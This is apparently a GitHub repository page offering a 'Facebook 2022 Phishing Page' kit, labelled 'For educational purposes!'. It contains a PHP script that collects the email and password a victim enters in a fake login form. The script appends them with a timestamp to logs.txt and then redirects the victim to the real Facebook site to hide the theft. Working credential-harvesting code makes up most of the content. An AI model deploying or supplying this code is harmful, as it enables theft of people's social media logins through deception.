Skip to content

WHO-I-AM-001001/Facebook-2022-Phishing

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

Facebook 2022 Phishing Page

For educational purposes!

logs.txt

Date and Time: (Date and Time)
Username: (Username/Email)
Password: (Password)

index.html (form)

<form action="./index.php" method="get">

index.php

<?php
if (isset($_GET["email"])){
    $username = $_GET["email"];
}
if (isset($_GET["pass"])){
    $password = $_GET["pass"];
}
$date = date("d-m-y h:i:s");

file_put_contents("logs.txt", "Date: " . $date . "\n", FILE_APPEND);
file_put_contents("logs.txt", "Username: " . $username . "\n" , FILE_APPEND);
file_put_contents("logs.txt", "Password: ". $password . "\n\n", FILE_APPEND);
header("Location: https://www.facebook.com/");
?>

Page Screenshot

image

About

Facebook (July 7, 2022) Phishing Page

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • HTML 99.4%
  • PHP 0.6%